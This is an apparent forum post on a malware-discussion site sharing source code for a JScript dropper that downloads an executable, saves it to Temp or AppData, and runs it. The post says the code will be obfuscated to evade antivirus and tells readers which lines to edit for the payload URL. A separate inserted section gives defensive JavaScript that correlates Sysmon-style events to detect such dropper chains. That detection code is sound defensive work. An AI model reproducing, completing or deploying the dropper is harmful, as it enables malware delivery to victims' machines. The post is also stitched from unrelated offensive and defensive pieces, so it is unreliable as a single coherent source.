Malware Simple Malware JS Dropper Source Code | evil-zone.org | 2024

For Malware Discussion

Anony


🔥 This code is a simple dropper, used recently by spreader. It will be obfuscated to avoid antivirus protection. To make sure how the script works, let me explain.

1️⃣ Download Payload

The script uses an HTTP request to download an executable file (windows.exe) from a specified URL (fileUrl).

var fileUrl = " ";
var httpRequest = WScript.CreateObject("Microsoft.XMLHTTP");
httpRequest.open("GET", fileUrl, false);
httpRequest.send();

2️⃣ Save the Payload

The script saves the downloaded file to a specific location on the user's file system, either in the temporary files directory or the application data directory.

var stream = WScript.CreateObject("Adodb.Stream");
stream.Type = 1; // binary
stream.open();
stream.write(httpRequest.responseBody);
stream.savetofile(fileName, 2); // save to file
stream.close();

3️⃣ Execute the Payload

After saving the file, the script executes it. It checks the file extension to determine the appropriate method for execution:

➡️ .jar files are run using java -jar.
➡️ .vbs and .wsf files are run using wscript.
➡️ Other file types are executed directly.

if (fileName.endsWith(".jar")) {
    shell.run("java -jar \"" + fileName + "\"");
} else if (fileName.endsWith(".vbs") || fileName.endsWith(".wsf")) {
    shell.run("wscript \"" + fileName + "\"");
} else {
    shell.run("\"" + fileName + "\"");
}

🦅 To edit the script, edit line...

➡️ 10 for the fileName.
➡️ 11 for the fileUrl.
➡️ 12 for the useTempPath (using it would be "true" and doesn't need admin)

Download:




 
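The three stages described in the post leave the same process trail however the script text is obfuscated. The following is an added defensive example, not part of the original post: it correlates Sysmon-style events (IDs 1, 3 and 11; the JSON shape, paths, PIDs and hostname are constructed and simplified) to flag a script host that connects out, writes into Temp or AppData, and then launches what it wrote.

```javascript
// Added defensive example. Events are constructed, simplified Sysmon-style JSON:
// EventID 1 = process create, 3 = network connection, 11 = file create.
const SCRIPT_HOSTS = /\\(wscript|cscript)\.exe$/i;
const USER_WRITABLE = /\\AppData\\(Local\\Temp|Roaming)\\/i;

// Returns one alert per child process that a script host launched from a file
// it had itself written to Temp/AppData, having also made a network connection.
function findDropperChains(events) {
  const hosts = new Map(); // script-host PID -> { net, files }
  const alerts = [];
  for (const e of events) {
    if (e.EventID === 1) {
      if (SCRIPT_HOSTS.test(e.Image)) hosts.set(e.ProcessId, { net: false, files: [] });
      const parent = hosts.get(e.ParentProcessId);
      if (!parent || !parent.net) continue; // stage 1 (download) not seen
      const cmd = e.CommandLine.toLowerCase();
      // Stage 3: the command line names a file from stage 2, whether it is
      // run directly or through java -jar / wscript.
      const dropped = parent.files.find((f) => cmd.includes(f.toLowerCase()));
      if (dropped) alerts.push({ hostPid: e.ParentProcessId, dropped, launcher: e.Image });
    } else if (hosts.has(e.ProcessId)) {
      const h = hosts.get(e.ProcessId);
      if (e.EventID === 3) h.net = true;
      if (e.EventID === 11 && USER_WRITABLE.test(e.TargetFilename)) h.files.push(e.TargetFilename);
    }
  }
  return alerts;
}

// Constructed sample data (hypothetical user, PIDs, hostname and file names).
const WS = "C:\\Windows\\System32\\wscript.exe";
const CS = "C:\\Windows\\System32\\cscript.exe";
const TEMP = "C:\\Users\\alice\\AppData\\Local\\Temp\\";
const ROAM = "C:\\Users\\alice\\AppData\\Roaming\\";
const SAMPLE_EVENTS = [
  { EventID: 1, ProcessId: 4100, ParentProcessId: 3000, Image: WS, CommandLine: "wscript.exe invoice.js" },
  { EventID: 3, ProcessId: 4100, Image: WS, DestinationHostname: "files.example.test" },
  { EventID: 11, ProcessId: 4100, Image: WS, TargetFilename: TEMP + "windows.exe" },
  { EventID: 1, ProcessId: 4200, ParentProcessId: 4100, Image: TEMP + "windows.exe", CommandLine: `"${TEMP}windows.exe"` },
  // Benign: no network activity, so writing and opening a log must not alert.
  { EventID: 1, ProcessId: 5000, ParentProcessId: 3000, Image: CS, CommandLine: "cscript.exe backup.js" },
  { EventID: 11, ProcessId: 5000, Image: CS, TargetFilename: TEMP + "backup.log" },
  { EventID: 1, ProcessId: 5100, ParentProcessId: 5000, Image: "C:\\Windows\\System32\\notepad.exe", CommandLine: `notepad.exe ${TEMP}backup.log` },
  // The .jar branch: the payload is launched through java -jar.
  { EventID: 1, ProcessId: 6000, ParentProcessId: 3000, Image: WS, CommandLine: "wscript.exe update.js" },
  { EventID: 3, ProcessId: 6000, Image: WS, DestinationHostname: "files.example.test" },
  { EventID: 11, ProcessId: 6000, Image: WS, TargetFilename: ROAM + "update.jar" },
  { EventID: 1, ProcessId: 6100, ParentProcessId: 6000, Image: "C:\\Program Files\\Java\\bin\\java.exe", CommandLine: `java -jar "${ROAM}update.jar"` },
];
console.log(findDropperChains(SAMPLE_EVENTS));
```

The correlation ignores PID reuse and event timestamps, which a production rule would need to account for.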


wow
 

ok
 
